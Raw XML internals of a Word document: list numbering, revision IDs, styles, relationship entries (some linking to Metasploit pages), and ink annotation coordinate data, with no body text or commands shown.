        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E79AA346" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6058778C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A4C24E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FC5A95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5920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CB083C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B150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156E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39781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jiu Li">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="41f80365c673a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9F"/>
    <w:rsid w:val="00017CF6"/>
    <w:rsid w:val="00023465"/>
    <w:rsid w:val="00037E85"/>
    <w:rsid w:val="00053AA6"/>
    <w:rsid w:val="000546FA"/>
    <w:rsid w:val="000727B1"/>
    <w:rsid w:val="00083EF8"/>
    <w:rsid w:val="00097315"/>
    <w:rsid w:val="000E0425"/>
    <w:rsid w:val="00106055"/>
    <w:rsid w:val="00107E0A"/>
    <w:rsid w:val="0011585B"/>
    <w:rsid w:val="0011688A"/>
    <w:rsid w:val="00122050"/>
    <w:rsid w:val="00137982"/>
    <w:rsid w:val="001473E6"/>
    <w:rsid w:val="00155A90"/>
    <w:rsid w:val="00191241"/>
    <w:rsid w:val="001A6488"/>
    <w:rsid w:val="001A7F9D"/>
    <w:rsid w:val="001D474F"/>
    <w:rsid w:val="00200E5A"/>
    <w:rsid w:val="00206AD2"/>
    <w:rsid w:val="002370BC"/>
    <w:rsid w:val="00241BC4"/>
    <w:rsid w:val="0025267B"/>
    <w:rsid w:val="00254BEE"/>
    <w:rsid w:val="00265CE7"/>
    <w:rsid w:val="00267B7C"/>
    <w:rsid w:val="002808A1"/>
    <w:rsid w:val="00283201"/>
    <w:rsid w:val="0028585C"/>
    <w:rsid w:val="002858EE"/>
    <w:rsid w:val="00294725"/>
    <w:rsid w:val="002A475E"/>
    <w:rsid w:val="002B2FE1"/>
    <w:rsid w:val="002C1E25"/>
    <w:rsid w:val="002C217E"/>
    <w:rsid w:val="002C702B"/>
    <w:rsid w:val="002E48A1"/>
    <w:rsid w:val="002F659C"/>
    <w:rsid w:val="002F6943"/>
    <w:rsid w:val="00301E46"/>
    <w:rsid w:val="00307B14"/>
    <w:rsid w:val="003143B6"/>
    <w:rsid w:val="00315494"/>
    <w:rsid w:val="00315F02"/>
    <w:rsid w:val="00316182"/>
    <w:rsid w:val="0033227F"/>
    <w:rsid w:val="00332A01"/>
    <w:rsid w:val="00341F41"/>
    <w:rsid w:val="00346429"/>
    <w:rsid w:val="00351C29"/>
    <w:rsid w:val="00367E0D"/>
    <w:rsid w:val="00371D13"/>
    <w:rsid w:val="00395937"/>
    <w:rsid w:val="003B47CD"/>
    <w:rsid w:val="003D4DAD"/>
    <w:rsid w:val="0040431C"/>
    <w:rsid w:val="004218A2"/>
    <w:rsid w:val="00432980"/>
    <w:rsid w:val="00470491"/>
    <w:rsid w:val="00475C05"/>
    <w:rsid w:val="0048133D"/>
    <w:rsid w:val="00485EAB"/>
    <w:rsid w:val="00486721"/>
    <w:rsid w:val="00493CC7"/>
    <w:rsid w:val="004C5986"/>
    <w:rsid w:val="004C73E7"/>
    <w:rsid w:val="004D25E4"/>
    <w:rsid w:val="005143F1"/>
    <w:rsid w:val="005228CD"/>
    <w:rsid w:val="00536568"/>
    <w:rsid w:val="0055060A"/>
    <w:rsid w:val="005828D6"/>
    <w:rsid w:val="00584194"/>
    <w:rsid w:val="00586C71"/>
    <w:rsid w:val="005A4E54"/>
    <w:rsid w:val="005B5317"/>
    <w:rsid w:val="005B7EB0"/>
    <w:rsid w:val="005C495A"/>
    <w:rsid w:val="005C5AA3"/>
    <w:rsid w:val="005C6502"/>
    <w:rsid w:val="005C6B27"/>
    <w:rsid w:val="005C7F10"/>
    <w:rsid w:val="00644B6B"/>
    <w:rsid w:val="00647DFA"/>
    <w:rsid w:val="00656642"/>
    <w:rsid w:val="006701AC"/>
    <w:rsid w:val="0069282B"/>
    <w:rsid w:val="006A745E"/>
    <w:rsid w:val="006B0C81"/>
    <w:rsid w:val="006B6130"/>
    <w:rsid w:val="006B6502"/>
    <w:rsid w:val="006C4D18"/>
    <w:rsid w:val="006D468D"/>
    <w:rsid w:val="006E1581"/>
    <w:rsid w:val="006E4A47"/>
    <w:rsid w:val="006E6761"/>
    <w:rsid w:val="00703B5B"/>
    <w:rsid w:val="00714E53"/>
    <w:rsid w:val="00752B32"/>
    <w:rsid w:val="0076168D"/>
    <w:rsid w:val="00763547"/>
    <w:rsid w:val="00764443"/>
    <w:rsid w:val="00784A8A"/>
    <w:rsid w:val="007B15FD"/>
    <w:rsid w:val="007B6CEC"/>
    <w:rsid w:val="007C3506"/>
    <w:rsid w:val="007D0A09"/>
    <w:rsid w:val="007D23B3"/>
    <w:rsid w:val="007F4A20"/>
    <w:rsid w:val="0082363D"/>
    <w:rsid w:val="00834337"/>
    <w:rsid w:val="00846DE5"/>
    <w:rsid w:val="00853A5B"/>
    <w:rsid w:val="00861B2E"/>
    <w:rsid w:val="00893942"/>
    <w:rsid w:val="008F7543"/>
    <w:rsid w:val="00907C7D"/>
    <w:rsid w:val="00920B9F"/>
    <w:rsid w:val="00931612"/>
    <w:rsid w:val="00933AD3"/>
    <w:rsid w:val="00953A96"/>
    <w:rsid w:val="00975D9E"/>
    <w:rsid w:val="00A23648"/>
    <w:rsid w:val="00A30BDA"/>
    <w:rsid w:val="00A52F24"/>
    <w:rsid w:val="00A70CD3"/>
    <w:rsid w:val="00A81113"/>
    <w:rsid w:val="00A957BE"/>
    <w:rsid w:val="00AD5BF4"/>
    <w:rsid w:val="00AD6220"/>
    <w:rsid w:val="00AD7C34"/>
    <w:rsid w:val="00AD7E52"/>
    <w:rsid w:val="00B10D09"/>
    <w:rsid w:val="00B12D8E"/>
    <w:rsid w:val="00B3148E"/>
    <w:rsid w:val="00B33EBE"/>
    <w:rsid w:val="00B5040B"/>
    <w:rsid w:val="00B6302C"/>
    <w:rsid w:val="00B70146"/>
    <w:rsid w:val="00B84C8E"/>
    <w:rsid w:val="00BA5294"/>
    <w:rsid w:val="00BA6EAF"/>
    <w:rsid w:val="00BB1BA9"/>
    <w:rsid w:val="00BC0534"/>
    <w:rsid w:val="00BD1E9A"/>
    <w:rsid w:val="00BE7636"/>
    <w:rsid w:val="00C16C64"/>
    <w:rsid w:val="00C20AFF"/>
    <w:rsid w:val="00C43F3A"/>
    <w:rsid w:val="00C54190"/>
    <w:rsid w:val="00C573CE"/>
    <w:rsid w:val="00C670EC"/>
    <w:rsid w:val="00C8715B"/>
    <w:rsid w:val="00C958CB"/>
    <w:rsid w:val="00CB04B3"/>
    <w:rsid w:val="00CB6426"/>
    <w:rsid w:val="00CE1109"/>
    <w:rsid w:val="00D069F0"/>
    <w:rsid w:val="00D17633"/>
    <w:rsid w:val="00D42A2A"/>
    <w:rsid w:val="00D44F16"/>
    <w:rsid w:val="00D83311"/>
    <w:rsid w:val="00D85E38"/>
    <w:rsid w:val="00DB11A3"/>
    <w:rsid w:val="00DB5C9F"/>
    <w:rsid w:val="00DE6069"/>
    <w:rsid w:val="00E16981"/>
    <w:rsid w:val="00E226AC"/>
    <w:rsid w:val="00E346E6"/>
    <w:rsid w:val="00E447C5"/>
    <w:rsid w:val="00E47E39"/>
    <w:rsid w:val="00EA52AE"/>
    <w:rsid w:val="00F16279"/>
    <w:rsid w:val="00F3089A"/>
    <w:rsid w:val="00F322B4"/>
    <w:rsid w:val="00F41116"/>
    <w:rsid w:val="00F57B5B"/>
    <w:rsid w:val="00F6324C"/>
    <w:rsid w:val="00F673F4"/>
    <w:rsid w:val="00F71EEE"/>
    <w:rsid w:val="00F73758"/>
    <w:rsid w:val="00F84761"/>
    <w:rsid w:val="00F860C8"/>
    <w:rsid w:val="00FA275C"/>
    <w:rsid w:val="00FB1E03"/>
    <w:rsid w:val="00FC4902"/>
    <w:rsid w:val="00FC6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FCFB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4986B6D2-7A94-45E2-A0AB-E258998E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8A1"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F41116"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F41116"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F41116"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F41116"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F41116"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F41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16"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE763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7636"/>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6055"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00470491"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00332A01"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="004C5986"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="004C5986"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00346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60488">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1287277820">
          <w:marLeft w:val="360"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="200"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="496772873">
          <w:marLeft w:val="360"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="200"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="807167520">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1137065362">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1727146587">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="184169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topics/computer-science/metasploit-framework" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.com/" TargetMode="External"/></Relationship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8.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink16.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId68"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7.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink1.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink11.xml"/><Relationship Id="rId37"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customXml" Target="ink/ink23.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.metasploit.com" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink32.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId90" Type="http://schemas.microsoft.com/office/2018/08/relationships/commentsExtensible" Target="commentsExtensible.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink6.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId48"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customXml" Target="ink/ink28.xml"/><Relationship Id="rId8" Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink20.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink3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image" Target="media/image21.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink27.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink5.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink21.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink25.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink30.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink34.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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customXml" Target="ink/ink19.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image200.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customXml" Target="ink/ink17.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink24.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink26.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink33.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><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customXml" Target="ink/ink4.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink12.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="comments.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink29.xm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50.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink36.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId82"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customXml" Target="ink/ink2.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink10.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink22.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink3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3:53:54.7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34 224,'-2'0,"0"-1,0 1,0-1,0 0,0 0,0 0,0 0,0 0,1 0,-1-1,-1 0,-4-3,-16-11,-1 0,-13-6,29 18,0 0,0 0,-1 1,1 1,0-1,-1 1,-1 0,3 1,-5 0,1 0,0-1,-1-1,1 0,-10-5,2 1,0 1,0 1,-1 1,-14-2,9 2,-132-18,143 19,0 0,1-1,-3-2,6 2,0 1,0 0,0 0,0 1,-1 1,-1 0,-16-1,-26-6,22 3,-10 1,-70 0,-19 6,116 0,0 0,0 1,0 1,0 1,0 0,-6 4,-26 8,-30 6,-70 13,119-29,0 1,0 1,-14 8,-38 12,66-25,1 0,0 1,0 1,1 0,-1 1,-8 6,16-10,1 1,0-1,0 1,0 0,1 0,-1 0,1 1,0-1,0 1,0 0,1 0,0 0,0 0,0 0,0 0,1 1,0-1,0 4,-1 25,1 1,3 25,-1-52,0 0,0-1,0 1,1-1,0 1,1-1,0 0,0 1,0-2,1 1,3 5,-1-4,1 0,-1-1,1 0,0 0,1 0,0-1,0 0,0-1,2 1,38 19,1-3,15 4,-8-3,-4-1,1-3,1-1,0-3,45 6,-73-17,33 5,1-2,50-2,289-6,-247 1,-141 0,0-1,0 0,0-1,-1 0,1-1,-1 0,1-1,-1 0,0 0,0-1,-1 0,0-1,0 0,0-1,0 0,1-2,13-10,-12 11,-1 0,-1-1,0 0,0-1,-1 1,0-2,3-5,10-23,-1-3,2-2,-12 23,2-3,6-17,-15 34,-2 0,1 0,-1 0,0 0,0 0,-1-2,-1-45,0 21,1 22,1 4,-1-1,-1 0,1 0,-1 1,0-1,-1 1,0-1,0 1,-1-1,-1-1,-1-4,0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30:17.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9'1,"-78"-1,0 0,1 0,-1 0,0 1,0-1,1 0,-1 1,0-1,0 1,1 0,-1-1,0 1,0 0,0 0,0-1,0 1,0 0,0 0,-1 0,1 0,0 0,0 1,-1-1,1 0,0 0,-1 0,0 1,1-1,-1 0,1 3,0 3,-1 0,1 1,-1-1,-1 11,0-6,0 8,0-11,0 1,1-1,0 1,1-1,3 17,0-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30:13.9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0,'0'17,"0"15,-6 55,-7-20,9-77,-11-28,13 24,1 1,-1-21,2 2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30:08.4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8,'2'1,"1"-1,-1 0,0 1,0 0,0-1,0 1,1 0,-1 0,0 0,0 1,-1-1,1 0,0 1,0-1,-1 1,1 0,1 2,2 1,-1 1,0 0,-1-1,5 11,30 86,-36-93,0 0,0 0,0 15,-1-13,3 20,-3-27,0-1,0 1,1-1,-1 0,1 1,0-1,0 0,0 0,3 4,-4-6,-1-1,1 1,-1-1,1 1,-1-1,1 1,-1-1,1 0,-1 1,1-1,-1 0,1 0,0 1,-1-1,1 0,-1 0,1 0,0 0,-1 0,1 0,0 0,0 0,0 0,0 0,0-1,1 1,-1-1,0 1,0-1,0 0,0 1,0-1,0 0,1-1,2-3,1 0,-1-1,6-9,-5 7,19-27,8-9,38-71,-67 107,0 0,0-1,-1 1,0 0,-1-1,0 1,0-1,0-15,-2 11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1905.67">360 323,'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30:02.7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45,'10'-11,"-1"0,0-1,0 0,7-16,-1 3,89-161,-99 176,1 0,15-17,-13 17,13-22,44-69,-31 51,-17 27,1 0,31-29,-25 27,24-31,-22 23,-19 2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22:34.2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58,"0"-2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14:49.2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53'0,"-1317"2,1 2,-1 1,0 2,9 4,54 10,31-2,1-6,37-4,117 1,132 2,-169-13,109 1,-192 5,50 0,1244-3,-748-3,-512 1,213-1,-275-6,-1-6,-131 13,36-3,0 3,0 1,18 0,33-1,-7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10:02.2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75'0,"-741"1,11 3,-9 0,2-2,-2-2,18 1,43 6,46 12,92 12,-132-22,31-4,-70-4,209 5,110 8,1-14,-140-1,193-7,-93 5,32 0,492-5,-571 9,1664-1,-1945-1,-1 0,0-1,6-2,21-4,-16 6,-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3:59:44.3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9 247,'-1'-4,"1"0,-1-1,0 1,-1 0,1 0,-1 0,0 0,0 0,0 1,0-1,-1 0,1 1,-1 0,-2-2,1-1,-8-9,0 0,-1 1,-1 0,0 1,-1 1,0 0,-1 1,0 1,-2-1,-2 1,-2 1,1 0,-1 2,-7-1,14 4,-1 1,1 1,-1 1,1 0,-1 1,-13 1,27-1,0 1,0-1,0 0,0 1,0-1,1 1,-1-1,0 1,0 0,1 0,-1 0,1 0,-1 0,1 0,-1 0,1 0,-1 1,1-1,0 0,0 1,-1 0,1 1,-1 0,1 1,0-1,0 1,0-1,0 1,1-1,0 1,-1-1,1 1,0 0,4 241,-5-215,0-18,1 0,0 0,1 0,0 0,1 2,0-10,-1 0,1-1,-1 1,1 0,0-1,1 1,-1-1,1 0,-1 0,1 0,0 0,0 0,2 1,0 0,0-1,0 1,1-1,0 0,0 0,0-1,0 1,1-1,20 3,-1 0,1-2,0-2,0 0,12-2,-4 0,-31 1,0 0,0-1,0 1,0-1,0 0,1 0,-2-1,1 1,0-1,0 0,0 0,1-1,0-1,1 0,-1-1,0 0,0 0,0 0,0 0,-1-1,-2 3,0-1,0 1,0 0,-1-1,1 1,-1-1,0 0,0 1,0-1,0-2,0-8,-1 0,0-5,2-21,3-20,-5 4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3:59:30.4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131'-5,"-24"0,472 4,-297 2,2253-1,-252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4:38:12.2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80 1083,'-46'-1,"0"-2,-7-4,-91-18,44 3,-12-8,-97-36,111 34,-535-142,575 160,-429-103,437 107,17 3,0 0,1-2,-12-6,9 3,-1 1,0 2,-11 0,-47-12,26 3,-14-4,-42-19,81 27,-9-1,-38-13,83 25,-85-34,-23-16,90 40,13 6,0 1,-6-1,-72-25,3 1,-3-5,8 3,-6 1,23 10,45 15,0 1,0 1,-1 0,0 2,1 0,-1 2,0 0,-5 1,13 1,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31:4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 0,'0'0,"-4"2,0 4,1 1,4 0,4 0,4-1,4-2,2-1,-1-1,-2-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4:38:00.4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1 119,'-1'0,"-1"1,1-1,-1 0,1 0,-1 1,1-1,0 1,-1 0,1-1,0 1,0 0,-1 0,1-1,-1 2,-15 16,11-11,-5 7,0 0,0 1,1 1,1 0,1 0,-3 10,-13 16,16-28,0-1,-2 9,4-8,0 1,1 0,0 5,4-14,0 0,0 0,1-1,-1 1,2 0,-1 0,0 0,1 0,0 0,1 2,0-5,-1 1,1 0,-1-1,1 1,0-1,0 0,0 